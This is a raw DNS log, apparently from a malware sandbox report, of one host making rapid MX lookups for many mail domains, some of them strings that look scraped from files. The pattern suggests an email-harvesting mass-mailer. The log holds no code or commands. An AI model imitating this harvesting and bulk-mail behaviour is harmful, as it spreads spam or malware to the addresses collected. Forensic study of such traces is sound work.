                                                                                                                                                                                                          Dec 4, 2023 13:00:07.584614038 CET192.168.2.41.1.1.10x11dfStandard query (0)1.10.295MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.709462881 CET192.168.2.41.1.1.10x11dfStandard query (0)2.2.15MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:07.771472931 CET192.168.2.41.1.1.10x11dfStandard query (0)0.23.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.262166023 CET192.168.2.41.1.1.10x11dfStandard query (0)thejameskyle.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.318734884 CET192.168.2.41.1.1.10x11dfStandard query (0)vision-media.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.394731998 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.599760056 CET192.168.2.41.1.1.10xe0e2Standard query (0)mail.reg.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:13.633389950 CET192.168.2.41.1.1.10x11dfStandard query (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:15.818461895 CET192.168.2.41.1.1.10x11dfStandard query (0)8.2.42MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.005812883 CET192.168.2.41.1.1.10x11dfStandard query (0)3.4.2MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.192451000 CET192.168.2.41.1.1.10x11dfStandard query (0)8.5.12MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.381217003 CET192.168.2.41.1.1.10x11dfStandard query (0)7.2.9MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.568037033 CET192.168.2.41.1.1.10x11dfStandard query (0)7.2.9MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:16.755254984 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.208739042 CET192.168.2.41.1.1.10x11dfStandard query (0)sitnik.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.270823002 CET192.168.2.41.1.1.10x11dfStandard query (0)blakeembrey.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.404135942 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.435187101 CET192.168.2.41.1.1.10xb18dStandard query (0)mx01.mail.icloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.521423101 CET192.168.2.41.1.1.10x11dfStandard query (0)2.5.3MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.583688974 CET192.168.2.41.1.1.10x11dfStandard query (0)2.5.3MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.709330082 CET192.168.2.41.1.1.10x11dfStandard query (0)18.2.0MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.833626986 CET192.168.2.41.1.1.10x11dfStandard query (0)8.13.17MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:23.960551023 CET192.168.2.41.1.1.10x11dfStandard query (0)8.6.28MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 13:00:24.022763968 CET192.168.2.41.1.1.10x11dfStandard query (0)9.0.6MX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.712129116 CET1.1.1.1192.168.2.40x11dfNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.712129116 CET1.1.1.1192.168.2.40x11dfNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.712129116 CET1.1.1.1192.168.2.40x11dfNo error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:38.828021049 CET1.1.1.1192.168.2.40xcf95No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.296446085 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.406470060 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.447907925 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.536264896 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.572977066 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.629677057 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.680444956 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.744317055 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.819017887 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.891000032 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:45.954781055 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.014142990 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.089236975 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.157896042 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.217000008 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.260643005 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.330054045 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.395101070 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.451685905 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.513133049 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.608899117 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.648612022 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.694787025 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.763109922 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.822603941 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.884673119 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:46.942701101 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.015193939 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.069314003 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.119302988 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.182794094 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.247742891 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.319988012 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.377485037 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.439150095 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.501830101 CET1.1.1.1192.168.2.40x11dfName error (3)3x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.577759027 CET1.1.1.1192.168.2.40x11dfName error (3)2x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:56:47.624058962 CET1.1.1.1192.168.2.40x11dfName error (3)4x.pngnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.935079098 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.935079098 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.935079098 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.935079098 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:08.935079098 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.000550032 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.000550032 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.000550032 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.000550032 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.000550032 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.044761896 CET1.1.1.1192.168.2.40x4c8cNo error (0)gmail-smtp-in.l.google.com172.253.115.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.055695057 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.055695057 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.055695057 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.055695057 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.055695057 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.139024019 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.139024019 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.139024019 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.139024019 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:09.139024019 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:57:36.697988987 CET1.1.1.1192.168.2.40x11dfNot Implemented (4)znonenone00false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.569813967 CET1.1.1.1192.168.2.40x11dfNo error (0)pobox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.607568026 CET1.1.1.1192.168.2.40x11dfNo error (0)netcom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.607568026 CET1.1.1.1192.168.2.40x11dfNo error (0)netcom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.607568026 CET1.1.1.1192.168.2.40x11dfNo error (0)netcom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.607568026 CET1.1.1.1192.168.2.40x11dfNo error (0)netcom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.688302040 CET1.1.1.1192.168.2.40xbcbbNo error (0)pb-mx22.pobox.com173.228.157.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.718607903 CET1.1.1.1192.168.2.40x3f1No error (0)mx01.earthlink-vadesecure.net51.81.61.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.728634119 CET1.1.1.1192.168.2.40x11dfNo error (0)northcoast.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.728634119 CET1.1.1.1192.168.2.40x11dfNo error (0)northcoast.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.728634119 CET1.1.1.1192.168.2.40x11dfNo error (0)northcoast.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.728634119 CET1.1.1.1192.168.2.40x11dfNo error (0)northcoast.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:03.912859917 CET1.1.1.1192.168.2.40x3565No error (0)mxa-00377f01.gslb.pphosted.com185.183.28.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.206684113 CET1.1.1.1192.168.2.40x11dfNo error (0)onlineconnections.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:04.712810993 CET1.1.1.1192.168.2.40x307cNo error (0)onlineconnections.com.au192.254.190.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.291105032 CET1.1.1.1192.168.2.40x11dfName error (3)src.dec.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.302264929 CET1.1.1.1192.168.2.40x11dfNo error (0)cl.cam.ac.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.482788086 CET1.1.1.1192.168.2.40xbb23No error (0)mx.cam.ac.uk131.111.8.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.482788086 CET1.1.1.1192.168.2.40xbb23No error (0)mx.cam.ac.uk131.111.8.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.482788086 CET1.1.1.1192.168.2.40xbb23No error (0)mx.cam.ac.uk131.111.8.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.482788086 CET1.1.1.1192.168.2.40xbb23No error (0)mx.cam.ac.uk131.111.8.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.492816925 CET1.1.1.1192.168.2.40x11dfNo error (0)theriver.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.657799959 CET1.1.1.1192.168.2.40xaf88No error (0)ismtp.sitestar.everyone.net64.29.151.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:07.985611916 CET1.1.1.1192.168.2.40x11dfName error (3)bryson.demon.co.uknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.979995012 CET1.1.1.1192.168.2.40x11dfNo error (0)openoffice.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.979995012 CET1.1.1.1192.168.2.40x11dfNo error (0)openoffice.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.979995012 CET1.1.1.1192.168.2.40x11dfNo error (0)openoffice.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:10.979995012 CET1.1.1.1192.168.2.40x11dfNo error (0)openoffice.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:58:11.090390921 CET1.1.1.1192.168.2.40xdc9fName error (3)mx2-lw-eu.apache.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.810046911 CET1.1.1.1192.168.2.40x11dfNo error (0)alumni.caltech.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.824368954 CET1.1.1.1192.168.2.40x11dfNo error (0)gzip.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.883122921 CET1.1.1.1192.168.2.40x11dfNo error (0)nongnu.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.921446085 CET1.1.1.1192.168.2.40xef33No error (0)gzip.org85.187.148.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.961072922 CET1.1.1.1192.168.2.40x11dfNo error (0)nongnu.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.991183043 CET1.1.1.1192.168.2.40x8e6bNo error (0)alumni-caltech-edu.mail.protection.outlook.com104.47.66.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.991183043 CET1.1.1.1192.168.2.40x8e6bNo error (0)alumni-caltech-edu.mail.protection.outlook.com104.47.55.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:06.996057987 CET1.1.1.1192.168.2.40x3aa4No error (0)eggs.gnu.org209.51.188.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.772983074 CET1.1.1.1192.168.2.40x11dfNo error (0)kinoho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.772983074 CET1.1.1.1192.168.2.40x11dfNo error (0)kinoho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.772983074 CET1.1.1.1192.168.2.40x11dfNo error (0)kinoho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.772983074 CET1.1.1.1192.168.2.40x11dfNo error (0)kinoho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.772983074 CET1.1.1.1192.168.2.40x11dfNo error (0)kinoho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:10.881917953 CET1.1.1.1192.168.2.40x24d7No error (0)aspmx.l.google.com142.251.167.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.243912935 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.243912935 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.243912935 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.243912935 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.243912935 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.307240963 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.307240963 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.307240963 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.307240963 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.307240963 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.368109941 CET1.1.1.1192.168.2.40xc1dfNo error (0)gmail-smtp-in.l.google.com142.251.16.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.375308037 CET1.1.1.1192.168.2.40x11dfNo error (0)outlook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.434587002 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.434587002 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.434587002 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.434587002 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.434587002 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.40.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.89.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.9.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.9.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.99.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:47.472886086 CET1.1.1.1192.168.2.40xde3aNo error (0)outlook-com.olc.protection.outlook.com52.101.40.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.393649101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                          Dec 4, 2023 12:59:48.393649101 CET1.1.1.1192.168.2.40x11dfNo error (0)gmail.comMX (Mail exchange)IN (0x0001)false
